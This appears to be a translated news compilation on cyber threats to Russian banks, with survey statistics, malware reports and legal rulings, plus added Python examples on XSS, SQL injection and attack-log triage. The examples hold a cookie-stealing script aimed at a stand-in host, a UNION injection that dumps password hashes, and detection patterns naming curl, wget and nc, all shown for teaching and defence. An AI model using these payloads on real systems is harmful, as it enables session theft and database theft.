Automated analysis of the source code established that all web applications contain vulnerabilities, and only 6% of the studied systems are free of high-risk vulnerabilities.

As one would expect, the financial sector is subject to the greatest risk (its share is 46% of the total number of studied web applications). High-risk vulnerabilities were found in all applications of banks and other financial institutions.

Financial and also government organizations, Positive Technologies experts note, are the most interested in source code analysis, since their web resources are priority targets for attackers, which is confirmed by the company's regular analytical reports.

Automated security analysis with PT AI showed that all tested web applications contain vulnerabilities of varying risk levels. Classified by risk level, most of them (65%) are of medium severity and 27% of high severity.

The most widespread vulnerability revealed by automated source code analysis is cross-site scripting (XSS), which an attacker can use to carry out phishing attacks on clients of the web application or to infect their workstations with malware (found in 82% of the tested systems).
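The reflected cross-site scripting pattern counted above, as an added example that is not code from the Positive Technologies report or from any bank's application: a page fragment that splices a search query straight into HTML, beside the output-encoded form. The page fragment, the payload and the host names are constructed for illustration, and the example goes one step beyond the text by showing the attribute context, where escaping alone does not stop a javascript: URL.

```python
"""Added example, not from the article: reflected XSS and its fix.
The HTML fragment, payload and URLs below are constructed."""
import html
from urllib.parse import urlparse

# Constructed: a payload that sends the session cookie to a phishing host,
# the kind of "attack on clients of the web application" the report counts.
PAYLOAD = "<script>location='https://evil.example/p?c='+document.cookie</script>"


def render_vulnerable(query: str) -> str:
    """Untrusted input is placed into HTML as-is, so the browser executes it."""
    return f"<p>No results for: {query}</p>"


def render_safe(query: str) -> str:
    """html.escape(quote=True) turns <, >, &, ' and " into entities, so the
    input can only be displayed, never parsed as markup. The rule must match
    the context: this is HTML body text, not an attribute or script block."""
    return f"<p>No results for: {html.escape(query, quote=True)}</p>"


def safe_href(url: str) -> str:
    """Attribute context. Escaping stops the payload from closing the quoted
    attribute, but 'javascript:alert(1)' is plain text that still executes
    when clicked, so the scheme is whitelisted and anything else is dropped."""
    scheme = urlparse(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_link_safe(url: str, label: str) -> str:
    return f'<a href="{safe_href(url)}">{html.escape(label, quote=True)}</a>'


def contains_script(page: str) -> bool:
    """Crude detector used for the demonstration: is there still a live
    <script> tag in the rendered page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))        # script tag reaches the browser
    print(render_safe(PAYLOAD))              # &lt;script&gt;... is inert text
    print(render_link_safe("javascript:alert(1)", "Login"))   # href="#"
```

A real application would get the same effect from a template engine with auto-escaping enabled and a Content-Security-Policy header as a second layer; the point of the pair above is that the fix is an output-encoding rule per context, not input filtering.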

Based on an analysis of the consequences of exploiting the vulnerabilities found in web applications, Positive Technologies specialists compiled a rating of security threats. The most widespread threat is the possibility of attacks on users of the web application (87% of banks and every one of the government institutions are exposed to it).

As Positive Technologies emphasizes, most users of such web resources are very poorly informed about information security and can easily fall victim to attackers. In addition, other critically dangerous vulnerabilities are also widespread among government web resources. For example, during examination of the web application of one municipal administration, a high-risk SQL injection vulnerability was found whose exploitation makes it possible to obtain sensitive information from the database.
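The SQL injection class mentioned above, as an added example that is not code from the report or from the municipal application it describes: a lookup built by string formatting, an injected UNION that pulls another column out of the same table, and the parameterised query that closes the hole. The table, its rows and the password hashes are constructed for the demonstration and are held in an in-memory SQLite database.

```python
"""Added example, not from the article: SQL injection that extracts data
from the database, beside the parameterised query. The schema, rows and
hashes below are constructed sample data."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for a real application's users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("admin", "sha256$deadbeef", "administrator"),
         ("ivanov", "sha256$cafef00d", "clerk")],
    )
    return conn


def profile_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """The input is pasted into the SQL text, so it can change the grammar."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def profile_safe(conn: sqlite3.Connection, username: str) -> list:
    """A placeholder: the driver passes the value out of band and it is only
    ever compared as data, never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Constructed payload: closes the string literal, appends a UNION whose second
# column is the hash instead of the role, and comments out the trailing quote.
UNION_PAYLOAD = "x' UNION SELECT username, password_hash FROM users -- "


def leaked_hashes(rows: list) -> dict:
    """Map username -> value in the 'role' position; after the injection that
    position carries the password hash."""
    return {user: value for user, value in rows}


if __name__ == "__main__":
    db = make_db()
    print(profile_vulnerable(db, UNION_PAYLOAD))   # both rows, hashes exposed
    print(profile_safe(db, UNION_PAYLOAD))         # [] : no such username
```

The vulnerable query runs a single statement, so an attacker does not need stacked queries; UNION alone is enough to read any column of any readable table, which is exactly how "sensitive information from the database" is obtained. Note also that escaping quotes by hand is not the fix; the placeholder is.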

Vulnerabilities leading to denial of service are the greatest problem for online stores, since a failure of the web application of an organization engaged in e-commerce is directly connected with financial losses. Moreover, the more popular the online store, the more customers visit it every day and the more likely it is that an attacker will try to use vulnerabilities of this web resource for attacks on its users.

Web applications are one of the main targets for attackers because the large number of unpatched vulnerabilities and the simplicity of exploiting them help attackers achieve their goals, from theft of sensitive information to access to internal resources of the local network, - noted Anastasia Grishina, analyst at Positive Technologies. - It is important to understand that the majority of vulnerabilities can be revealed long before an attack, and analysis of the source code of web applications allows several times more critically dangerous vulnerabilities to be detected than testing systems without examining the code.

FinCERT: the main facts about financial fraud in Russia

As became known in February 2018, FinCERT of the Central Bank issued an overview of fraudulent financial transactions in Russia for 2017.

The first successful attack via SWIFT

According to the overview, in 2017 hackers for the first time managed to attack a Russian bank successfully via the SWIFT system and to steal 339.5 million rubles. According to Vedomosti and Kommersant, Globex bank fell victim to the attack. The bank's president Valery Ovsyannikov confirmed that "there was an attack attempt" but noted that clients' funds did not suffer. The bank disclosed the amount of the theft at the end of December 2017: hackers were able to withdraw about $1 million, but most of the funds were blocked and returned.

In general, according to experts, use of the SWIFT channel is unusual for Russia. As a rule, hackers use cards to withdraw funds. In world practice this system is used much more often.

Fraud with accounts of legal entities

In 2017 there were 841 attempts to steal funds from company accounts. At the same time, the volume of such transactions in 2017 decreased by 17.4% to 1.57 billion rubles. Slightly more than half of this amount was returned.

Sums from 100 thousand to 1 million rubles are of the greatest interest to fraudsters. Half of fraudulent transactions with company accounts fall in this segment. A little more than a third fall in the segment from one to ten million.

The most popular method of stealing money is implanting malicious code, since most transactions are made from desktop computers.

Attacks on cards

According to the FinCERT overview, the average amount of card fraud in Russia in 2017 was 3 thousand rubles. This indicator decreased, as did the volume of attackers' transactions with cards issued in Russia, which in 2017 amounted to about 1 billion rubles.

Slightly less than half of the operations with Russian bank cards take place outside Russia. At the same time, the absolute leader in the number and volume of fraudulent bank card transactions within Russia is Moscow, the overview says.

A possible explanation for the decreased interest in theft with bank cards, according to experts, could be the increasingly active development of cryptocurrencies and, as a result, the switching of fraudsters' attention to them. However, this trend may be short-lived. Legislative regulation of the cryptocurrency market may lead to growth of fraudulent transactions, FinCERT believes[12].

Legislative regulation of the relevant market (cryptocurrencies - TAdviser's comment) may reduce its attractiveness for attackers, which may cause an increase in their activity in the area of remote payment services and, as a result, an increase in the number and volume of unauthorized transactions, the overview says.

As it turns out, many Russians and companies prefer not to contact law enforcement agencies in the event of fraud with their bank card. Thus, for 97% of unauthorized card transactions it is either known for certain that there was no appeal to law enforcement bodies, or there are no data about such an appeal. Only 20% of legal entities that faced fraud contacted law enforcement agencies.

Attacks on ATMs and terminals

Statistically, fraudsters' interest in them is decreasing. Thus, the volume of illegal transactions with them fell by a third to 230.7 million rubles, and the damage from fraudsters' actions was 42 million rubles.

According to FinCERT, several methods of hacking ATMs are mainly used: connecting devices to the ATM that allow it to be controlled, remote control after infection with a virus, and physical impact (for example, explosion).

Attackers' attention has switched to CNP transactions (card not present), in which the cardholder may not be physically present at the time and place of payment. Their volume is insignificant (about 1.5%) but grew, amounting to 726.4 million rubles.


Research by TAdviser and VMware

In December 2017 VMware presented the results of a study of the largest financial institutions conducted together with the analytical center TAdviser. According to the report, more than half (52%) of banks and insurance companies in Russia and the CIS increased their information security budget in 2016-17 in connection with the growth of cyber threats and malware activity.[13]

The research once again confirmed that over the last year the number of information security threats to the corporate sector grew considerably; this is confirmed by 80% of the financial institutions polled. Only 16% recorded the previous level of cyber crime being maintained. Reputational and financial losses (including lost profit) are the most critical consequences of cyber security incidents in financial institutions, according to about 50% of respondents. Therefore, under conditions of growing cyber threats, more than half (52%) of companies increased their budget for protection tools.

Nearly a third of respondents (28%) also fear measures from regulators (for example, revocation of licenses) as a result of a successful attack or data leak. However, whatever the consequences may be, nobody doubts that they are inevitable.

Banks actively offer their clients the opportunity to interact online, for example through online banking and mobile applications. It is therefore no wonder that companies named DDoS attacks (28%) among the most widespread threats to the financial sector. Unavailability of mobile or online banking even for several hours can considerably damage a bank's reputation or lead to real financial loss. Among other threats respondents noted phishing (26%) and ransomware attacks (10%).

Digital transformation of the banking business also means moving computing to the cloud. For example, according to [14], in the USA 81% of respondents from banks with assets of $100 billion or more and 68% of banks with assets from $15 to $100 billion are now adopting cloud computing. However, financial companies in Russia have serious concerns about the cloud model. Thus, more than two thirds (70%) consider data loss or theft the main risk when migrating to a cloud environment. Far behind, respondents noted downtime caused by the provider (26%).

Use of mobile devices for work tasks is becoming the norm for bank employees as well. However, more than half of financial institutions (53%) do not use any mobile device management solutions (MDM/EMM), which can ultimately lead to leaks of corporate data.

The danger to business is that not only the number and scale of attacks are growing: attackers increasingly use unknown malware. These are malicious programs that traditional antivirus cannot track, because there are no data about them yet in the databases of cyber security companies. An effective answer to this new threat is the "zero trust" model, made possible by software-defined networks (SDN); it is implemented in the VMware NSX solution. According to the poll, half (50%) of banks and insurance companies are guided by the "zero trust" model when building their cyber security systems, but only 4% of respondents have already deployed software-defined networks. Fortunately, 40% of organizations confirm plans to use SDN.

"In the modern digital economy, data are a key asset of banks and insurance companies. Their leak or unauthorized access to them can lead to critical consequences for the whole organization. SDN technologies (software-defined networks) are designed to help our customers respond to these information security challenges, - says Alexander Vasilenko, head of VMware in Russia and the CIS. - VMware's information security strategy, together with partner solutions, allows built-in protection to be provided at all levels of networks, clouds and end devices. For example, thanks to VMware NSX microsegmentation technology, if one network segment is compromised, the spread of the epidemic to other segments can be stopped. This approach makes it possible to significantly minimize damage even if attackers have already managed to penetrate your network".

A boom of Trojans masquerading as mobile banking applications

At the end of November 2017, Group-IB noted a wave of mass distribution of Trojans masquerading as the mobile applications of the country's leading banks. Group-IB specialists block the resources from which these applications are distributed, but their number is constantly growing.

The Trojans, intended for mobile devices running Android, are distributed not through the official Google Play store but through advertisements in search engines. At the same time, Group-IB experts noted the high quality of the counterfeit programs, which confuses many users who do not pay attention to suspicious "trifles".

Research by Qrator Labs and Wallarm

The research was carried out in the format of a field survey. Respondents were asked to answer the questions of a questionnaire. The survey was organized among banks and payment systems operating in Russia. The sample includes banks from the TOP 200 rating by assets.

Cyber security budget

The information security industry naturally continues to grow. According to the survey, nearly a third (32%) of respondents from the financial industry confirmed an increase in the cyber security budget in 2016, and another 39% noted that investment in security was kept at the previous level.

It is noticeable that growth in cyber security budgets is becoming directly tied to a practical component: financial institutions plan to increase security spending once they find themselves facing a real threat. This is remarkable for two reasons: while formal compliance with regulators' requirements is ceasing to be the main growth driver, proactive defense tactics and planning of the cyber security architecture on the basis of at least penetration testing (pentests) are still not such a driver.

13% of respondents reported that the cyber security budget in their organizations decreased slightly in 2016. At the same time, respondents in general note the lack of a link between budget reductions and the actual level of threats: the reasons for reducing cyber security budgets generally lie in another plane and do not depend on the state and challenges of the cyber security discipline. In fact, a noticeable part of cyber security departments in 2016 were tasked with optimizing expenses while maintaining or even raising the required level of security against external adverse conditions, although across the industry as a whole the tendency toward budget growth currently persists.

Replacement of protection tools in use

The protection methods implemented earlier provide an insufficient level of security today: threats in existing directions have grown, and new risks have appeared.

In most cases the main incentive for updating cybersecurity infrastructure is external activity: incidents demonstrating insufficient protection, and problems staged either by "black hats" (hackers) or by "white hats" (testers). More than a quarter of respondents see a need to replace the protection tools they use when migrating to new infrastructures (clouds, microservices and so on), where the existing solutions cease to be effective.

The origin of the purchased products plays a noticeable role in decisions to update protection tools: about 13% of respondents answered that they are primarily inclined to replace imported solutions with Russian analogs.

Acquisition of a WAF solution

As the decisive factor in buying a WAF solution, respondents named protection against zero-day vulnerabilities (37%). Only new-generation solutions that use a signature-less approach to attack detection have such potential. A considerable share of companies still uses a WAF for compliance with the PCI DSS standard (27%).

36% of respondents use a WAF to sustain a high pace of development: 19% to protect frequently updated code and 17% for virtual patching of vulnerabilities. The growing number of companies applying security solutions at the code-writing stage indicates a general growth in awareness of standard information security practices and the formation of a mature approach to comprehensive protection of web applications.

Types of threats

More than half of the respondents from the financial sector (55%) note that the level of DDoS threats has grown over the last year. DDoS attacks still target financial-sector organizations more often than companies from other industries, such as retail or media. However, what matters now is not only that attackers know exactly where the funds that interest them are stored, but also that they understand by what methods this money can be obtained. Having launched a DDoS attack as a distraction, attackers can use malware to seize a cashless payment management system and thus gain the ability to transfer money between arbitrary accounts until they are detected.

It follows that the protection systems used in financial institutions are imperfect, and approaches to developing IT infrastructure require review and updating.

The threat of denial-of-service attacks continues to grow: nearly half of respondents experienced at least one DDoS attack in 2016. When they encounter protective measures, attackers usually switch their attention to other targets. This is probably why a number of companies in the financial sphere faced DDoS attacks in 2016 for the first time. At the same time, about 20% of companies are in the attackers' focus and are forced to apply advanced protection methods. Among the main reasons a financial institution comes into the focus of DDoS organizers are the organization's size and prominence in the market, as well as the lack of adequate countermeasures against DDoS attacks, which can make the organization an easy mark for cyber-extortionists.

Thus, as various anti-DDoS solutions become widespread, the market landscape may change. In particular, the expected increase in the sophistication of "trial" attacks will continue to drive the evolution of protection tools and to raise the threat for organizations and entrepreneurs that do not plan cybersecurity investment adequate to the challenges.

The polled companies from the financial sector most often face phishing (30%) and DDoS attacks (26%). Compared with the 2015 survey results, the DDoS threat remained roughly the same (24% in 2015). The persistently high number of DDoS attacks, and the banking sector's attention to them, is explained by a wave of massive DDoS attacks on a number of large Russian banks: in 2016 the websites of many well-known top-10 financial institutions were attacked.

The phishing threat grew significantly (from 21% in 2015 to 30% in 2016) in connection with companies launching ICOs. The unceasing hype around ICOs led to a high risk of fraud, while average users have no clear idea of how to protect themselves and tend not to notice internet fraud. Phishing has become a serious problem in the ICO space, which suggests that in related industries, such as the financial sector, the attackers' focus is also shifting towards this method of gaining access to users' confidential data.

The shift of focus towards phishing is one consequence of the development of the tools available to cybercriminals. In particular, although the number of break-ins per unit of time has generally remained at the same level in recent years, financial institutions cannot always detect and precisely remediate such incidents in a timely manner.

According to Wallarm data, the average number of attacks on web applications in the financial sphere is 1,500 a day. Most of them come from automated tools and scanners. This automated activity creates a lot of background noise and complicates the identification of real incidents. According to Wallarm statistics, the main attack vectors against web applications are SQL injection (SQLi), 26.8%, and cross-site scripting (XSS), 25.6%. The keen interest in these attack types is connected with the possibility of obtaining information from customer databases and users' personal data. Third and fourth place are taken by path traversal, 25%, and remote code execution, 19.5%. At the same time, most incidents (60%) are connected with remote code execution.
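The attack mix above (SQLi, XSS, path traversal, RCE) and the noise that automated scanners add to it are exactly what a first-pass log triage has to separate. The Python below is an added example, not Wallarm's or Qrator Labs' code: the log lines, the signature patterns, the scanner user-agent list and the burst threshold are all constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Signature patterns for the four attack classes named in the Wallarm statistics,
# applied to the URL-decoded request path and query string. Constructed for the
# example; a production WAF uses far richer (and signature-less) detection.
PATTERNS = {
    "SQLi": re.compile(r"(?i)(\bunion\b.+\bselect\b|'\s*or\s+\S+\s*=\s*\S+|--\s*$|;\s*drop\b)"),
    "XSS": re.compile(r"(?i)(<script\b|javascript:|\bon(error|load|click|mouseover)\s*=)"),
    "Path traversal": re.compile(r"(\.\./|\.\.\\)"),
    "RCE": re.compile(r"(?i)([;|`]\s*(cat|wget|curl|nc|sh|id)\b|\$\()"),
}

# User-agent fragments of common automated scanners (constructed list).
SCANNER_UA = ("sqlmap", "nikto", "nmap", "zgrab")

# One log line: client IP, quoted request line, status, quoted user agent.
LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) "([^"]*)"$')

# Constructed sample traffic (not real bank logs): one scanner burst, one ordinary
# customer session and one low-volume source probing by hand.
SAMPLE_LOG = """\
10.0.0.5 "GET /api/accounts?id=1%27%20OR%201%3D1-- HTTP/1.1" 200 "sqlmap/1.1"
10.0.0.5 "GET /api/accounts?id=1%20UNION%20SELECT%20card_no%20FROM%20cards HTTP/1.1" 500 "sqlmap/1.1"
10.0.0.5 "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 "sqlmap/1.1"
10.0.0.5 "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 "Nikto/2.1.6"
10.0.0.5 "GET /cgi-bin/status?cmd=%3Bid HTTP/1.1" 404 "Nikto/2.1.6"
203.0.113.7 "POST /login HTTP/1.1" 200 "Mozilla/5.0"
203.0.113.7 "GET /transfer?to=40817810099910004312&amount=15000 HTTP/1.1" 200 "Mozilla/5.0"
198.51.100.9 "GET /report?template=..%2F..%2FWEB-INF%2Fweb.xml HTTP/1.1" 200 "Mozilla/5.0"
198.51.100.9 "GET /api/export?name=x%7Ccurl%20198.51.100.9 HTTP/1.1" 200 "Mozilla/5.0"
"""


def parse_line(line):
    """Split one log line into its fields; the path is URL-decoded twice because
    scanners often double-encode payloads to slip past naive filters."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ip, method, path, status, ua = m.groups()
    return {"ip": ip, "method": method, "path": unquote(unquote(path)),
            "status": int(status), "ua": ua}


def classify(path):
    """Return the first matching attack class, or None for a benign request."""
    for name, rx in PATTERNS.items():
        if rx.search(path):
            return name
    return None


def summarize(log_text, burst_threshold=3):
    """Count hits per attack class and separate scanner noise from the rest.

    A source counts as a scanner if its user agent names a known tool or if it
    produced at least `burst_threshold` attack requests. Attack hits from any
    other source are returned as candidate incidents for an analyst to review.
    """
    per_class = Counter()
    hits_by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rec["class"] = classify(rec["path"])
        if rec["class"]:
            per_class[rec["class"]] += 1
            hits_by_ip[rec["ip"]].append(rec)
    scanner_ips = {
        ip for ip, recs in hits_by_ip.items()
        if len(recs) >= burst_threshold
        or any(tag in recs[0]["ua"].lower() for tag in SCANNER_UA)
    }
    incidents = [r for ip, recs in hits_by_ip.items() if ip not in scanner_ips
                 for r in recs]
    return {"per_class": dict(per_class), "scanner_ips": sorted(scanner_ips),
            "incidents": incidents}


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    print("hits per class:", report["per_class"])
    print("scanner sources (noise):", report["scanner_ips"])
    for r in report["incidents"]:
        print("review:", r["ip"], r["class"], r["path"])
```

On the sample, the scanner burst from 10.0.0.5 is set aside as noise while the two quiet hits from 198.51.100.9 against a 200 response are the ones surfaced for review.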

Types of solutions used

Most respondents (68%) consider hybrid solutions (a client-side solution combined with an operator's solution, or a distributed network) the most effective means of countering DDoS.

According to the research, information security remains a significant priority for financial-sector organizations, and this priority steadily grows: the industry is in a stage of awakening. Market participants have not yet fully focused on cybersecurity threats, but to some extent one can already speak of Russian financial institutions reaching a certain level of maturity in protection and risk management. The rethinking of security policies in the banking industry will continue, as shown by the fact that cybersecurity spending is not being cut but, on the contrary, generally grows. In the short term, with budget growth, we will see an increase in the companies' level of security.

Sberbank: most thefts of money from customer accounts "happen by the clients' own hands"

Most fraud involving theft of money from customer accounts "happens by the clients' own hands", Sergey Lebed, head of Sberbank's cybersecurity service, told TAdviser in November 2017. Clients themselves give away their passwords, cards and phones, and pass on SMS confirmation codes. Such fraud is called social engineering, and within social engineering "self-transfer", he says.

In social engineering, attackers find a reason for a person to take actions that lead to loss of money. As a rule, self-interest is exploited, for example, the chance to buy something at a discount or an attractive commercial offer. Another pretext is that a relative of the client has supposedly gotten into trouble, Lebed told TAdviser.

Sergey Lebed is sure that the technical methods for protecting Sberbank's clients are quite effective

Elderly people who think of their grandchildren and children are especially susceptible to such influence: having received a request, they run to the ATM at once and do what the attackers tell them, he notes.

According to him, there are often cases when the bank's anti-fraud systems "see" that fraud is happening and why: when a client unexpectedly starts transferring money to a fraudster's card, and we know that it is a fraudster's card. In this case we stop the transaction and call the client to warn them and stop it.

It happens that even Sberbank staff fall into social engineers' traps, it follows from Sergey Lebed's words.

The technical methods for protecting Sberbank's clients are quite effective, but countering social engineers is a rather big problem. The bank sees its solution in raising the financial and computer literacy of the population. According to Sergey Lebed, the bank does a lot of work in this direction: awareness work both on Sberbank's own platforms and on the federal TV channels.

The Sberbank representative added that one of the cybersecurity service's tasks, besides preventing theft of money, is the stability and continuity of the bank's business processes and customer service. Sergey Lebed told TAdviser that Sberbank's downtime from computer attacks in 2017 was zero minutes: "i.e., we did not interrupt the bank's operations for a second because of the various attacks".

The Supreme Court of the Russian Federation explained the subtleties of classifying cyberfraud

The Supreme Court of the Russian Federation explained to judges how to properly classify cyberfraud and bank card fraud. The Plenum of the Supreme Court issued the resolution "On Judicial Practice in Cases of Fraud, Misappropriation and Embezzlement", which for the first time specifies in which cases and how the new fraud articles added to the Criminal Code of the Russian Federation in 2012 should be applied, TASS reported in November 2017 [15].

Use of software or hardware-software tools to act on servers, computers (including portable ones) or information and telecommunications networks for the purpose of unlawfully taking someone else's property or acquiring the right to it falls under the article "Fraud in the Field of Computer Information" (Article 159.6 of the Criminal Code of the Russian Federation). Such actions should additionally be classified under the Criminal Code articles on unlawful access to computer information or on the creation, use and distribution of malware.

Use of someone else's credentials is to be classified under the article "Theft". Use of someone else's credentials means covert or fraudulent use of the victim's phone connected to the Mobile Bank service, logging in to an internet payment system with stolen credentials, and so on.

Theft of property by spreading knowingly false information online (creating counterfeit websites and online shops, using e-mail) is to be treated as ordinary fraud under Article 159 of the Criminal Code of the Russian Federation.

The article "Fraud Using Payment Cards" (Article 159.3 of the Criminal Code of the Russian Federation) applies in cases where the fraudster passed himself off as the genuine bank card holder when paying for purchases or performing banking operations. Withdrawing cash via ATMs is classified as theft.

Theft of non-cash funds using the owner's personal data, password or card data that the criminal obtained from the owner by deception or abuse of trust, the Supreme Court resolution explains, should also be regarded by the court as theft.

Production, storage and transportation of counterfeit payment cards, technical devices and software for the unlawful acceptance, issuance or transfer of money is to be regarded as preparation for a crime (if the crime was not committed for reasons beyond the perpetrator's control).

Sale of counterfeit payment cards, technical devices and software that are unfit for use, allegedly for stealing money, is regarded as fraud or petty theft.

Production or acquisition of counterfeit bank cards for the purpose of theft on a large or especially large scale, without the intent being carried through (for reasons beyond the perpetrator's control), constitutes both preparation for theft and the completed crime provided for by Article 187 of the Criminal Code of the Russian Federation ("Illegal Circulation of Means of Payment").

The Silence virus attack

On October 31, 2017, Kaspersky Lab announced a new cyber attack on banks. Hackers send infected e-mails disguised as messages from real people at financial institutions.

The attackers use a Trojan called Silence, which is attached to phishing letters. Often the text of the letters looks like a standard request to open an account, Kaspersky Lab warns.

Kaspersky Lab announced a hacker attack on Russian banks

"The attackers use legitimate administrator tools to remain unnoticed. This complicates both attack detection and attribution," noted Sergey Lozhkin, senior anti-virus expert at Kaspersky Lab.

The letters contain infected attachments in .chm format (Microsoft help files). When the attachment is opened, the HTML file embedded in it, which contains malicious JavaScript code, is started automatically. The script downloads and activates a dropper, which in turn downloads the modules of the Silence Trojan; these run as Windows services: a command-and-control module, a screen activity recording module, a module for communicating with the control servers, and a program for remotely executing console commands.

Thus the hackers take control of the infected computer and can send letters with a malicious attachment on behalf of the banks' real partners.

The attackers gain access to the bank's internal network, spend some time studying its internal infrastructure and record video from the screens of bank employees' computers. After analyzing how the banking software is used, the attackers transfer money.

The first attacks using the Silence Trojan were recorded in July 2017. The spread of the virus continues at the time of writing (October 31). Hacker attacks using this virus have been observed in Russia, as well as in Armenia and Malaysia.[16]

Banks will get the right to block customer accounts when suspicious transactions are carried out

The Government of the Russian Federation submitted to the State Duma a bill drafted by the Ministry of Finance that gives banks the right to block cards and customer accounts if the financial transactions performed on them appear suspicious to the credit institution. On suspicion of theft, the bank must contact an individual without delay by phone or e-mail, and a legal entity in the manner set out in the electronic payment instrument usage agreement. The authorities' legislative initiative led to a surge of activity on social networks: users fear possible mass blocking of citizens' personal bank accounts without weighty grounds, and also express concern about whether credit institutions will start abusing the right granted to them.

The criteria by which financial transactions can be classified as suspicious have not yet been defined.

Comment from an expert of IC TsERIH Capital Management: First of all, it is worth emphasizing that the drafted document is titled "On Amendments to Certain Legislative Acts of the Russian Federation (Regarding Countering the Theft of Money)". Thus, the law is initially aimed at protecting law-abiding citizens and at complicating life only for fraudsters trying to steal money from the accounts of legal entities and individuals.

To this end, the Ministry of Finance proposes granting banks the right to suspend a money transfer for up to two working days when signs are identified that the transfer is being made without the payer's consent. On suspicion of theft of money, the bank must contact the client at once to obtain confirmation that the payment needs to be carried out.

How the newly adopted law will work depends largely on the bylaws that supplement it. Here we mean the development of criteria by which the financial transactions performed by clients can be classed as suspicious. This work will be entrusted to the Central Bank, and whether law-abiding citizens will have problems depends on the precision of the regulator's wording. Therefore we suggest waiting for the publication of this document and only then drawing conclusions about how precisely it reflects current economic realities.

Another pitfall will be the credit institutions' right to supplement or change the list of signs set by the Central Bank of the Russian Federation according to the specifics of their activity. It is important to understand whether this means the power to initiate legislation, or whether credit institutions, without waiting for an answer from a higher instance, will build customer relations on the basis of their own criteria and assessments. If the situation develops along the second path, confusion in the banking sector as a whole cannot be ruled out, as each bank will have its own criteria for blocking accounts. And clients' problems will arise not because banks abuse their powers, but because of their desire to play it safe.

It is also important how, in light of the new law, interaction between a credit institution and its client will be built in a disputed situation. Today, when blocking an account (for example, when large sums are deposited to or withdrawn from a card, when large transfers are made to the client's bank account, or when large sums are transferred to a third party), the bank asks for explanations and copies of documents confirming the source of the funds. Even so, after consideration the bank may refuse to unblock the customer's account with the wording "The documents do not explain the economic sense of the transactions".

Today, already at the bank's first refusal to carry out a transaction as suspicious (regardless of whether there was actually a violation or not), clients are entered in the blacklist of "refuseniks". It is compiled by Rosfinmonitoring and the Central Bank and, since June of this year, is provided to banks. And although the list itself is informational in nature, inclusion in it often becomes grounds for the bank to refuse service to the client. At the same time, today there is no mechanism for rehabilitating clients who were included in this list by mistake. And by a number of experts' estimates, these may be about 10 percent.

The opinion is now voiced that after the new law enters into force, banks should expect a mass outflow of personal funds and, as a result, a reduction in transaction volumes. Supposedly this process has already been actively under way for the last six months. We believe such concerns are exaggerated, for at least two reasons.

  • First, a client who withdraws funds from a bank solely because the bank can supposedly freeze the account at any time must have an alternative mechanism for settlements with partners. At the moment, no such reliable and effectively working mechanism exists outside the banking system.
  • Secondly, commissions for settlement and cash services, for the use of money transfer systems and for various payment services make up an essential share of the revenues of credit and financial organizations. A reduction in the number of their clients will automatically lead to a decrease in profit.

Payment terminals in Russia under attack by a Trojan

At the beginning of July 2017, Kaspersky (formerly Kaspersky Lab) announced that a modification of the Neutrino Trojan, which attacks POS terminals and steals bank card data, is actively spreading in Russia. According to the company's statistics, a quarter of all attempts by this malware to penetrate corporate systems fell on the country. Algeria, Kazakhstan, Ukraine and Egypt also fell within Neutrino's zone of interest. About 10% of all infection attempts targeted small businesses.

The POS-terminal modification of Neutrino is a not entirely typical version of this malware, which has been known to researchers for a long time and has repeatedly changed its functions and distribution methods. This time the Trojan hunts for bank card data passing through infected payment terminals. Neutrino does not begin its activity and start collecting information immediately: once inside the POS terminal's operating system, the Trojan waits for some time. Experts believe that in this way it most likely tries to bypass protective technologies that run suspicious code in an isolated virtual environment, so-called "sandboxes", for a short period.

Geography of distribution of the Neutrino Trojan attacking POS terminals, March-July 2017

"Neutrino once again confirms that cyberthreats constantly evolve. New versions of known malware become more complex, their functionality expands, and their appetites grow. And as the number of different digital devices increases, the fields of malware distribution also become wider. In such conditions, proactive protection against the whole variety of cyberthreats is needed more than ever before," emphasized Sergey Yunakovsky, anti-virus analyst at Kaspersky Lab.

Kaspersky Lab's protective solutions detect the new modification of Neutrino as Trojan-Banker.Win32.NeutrinoPOS and block its activity.

The Petya ransomware attack

On June 29, 2017, the regulator reported that the Petya virus attack began with a mass mailing of e-mails with the virus attached. "The attackers persuaded the user, through the text of the messages, to open the malicious file, after which the malware was activated. Presumably the infection occurred by exploiting the CVE-2017-0199 vulnerability (arbitrary code execution from Microsoft Office applications and WordPad)," the Central Bank explained.

Malware disguised as Pokemon Go

In Russia, mass cases of illegal withdrawal of funds from credit cards using malware distributed under the guise of the game Pokemon Go have been registered. The program intercepts SMS sent by the bank and also provides access to internet banking. For the widest possible distribution of the software, criminals exploited the popularity of the game Pokemon Go, whose official release in Russia had not yet taken place[17].

The news was reported at a press conference on combating cybercrime by Denis Durov, head of Department "K" of the Regional Office of the Ministry of Internal Affairs of the Russian Federation for the Yaroslavl region, and Evgeny Efremov, deputy manager of the Yaroslavl region branch of the Main Directorate of the Central Bank of the Russian Federation for the Central Federal District.

Durov said that in 2016, 200 criminal cases connected with fraud and 92 cases concerning illegal withdrawal of funds from credit cards were opened in the Yaroslavl region. According to him, the main methods of theft are attaching special devices to ATMs, phishing and the use of malware, and the last method is becoming more and more widespread.

However, phishing remains the most widespread method of stealing from cards. In a phishing operation, criminals call the victims, pose as bank employees and request credit card details, Durov notes. As of October 1, 2016, 2.1 million credit cards had been issued in the region. Many cardholders are insufficiently informed about security measures when using them and consider it normal to disclose card details to a "bank employee" over the phone.

Browser plug-ins as a means of stealing from cards

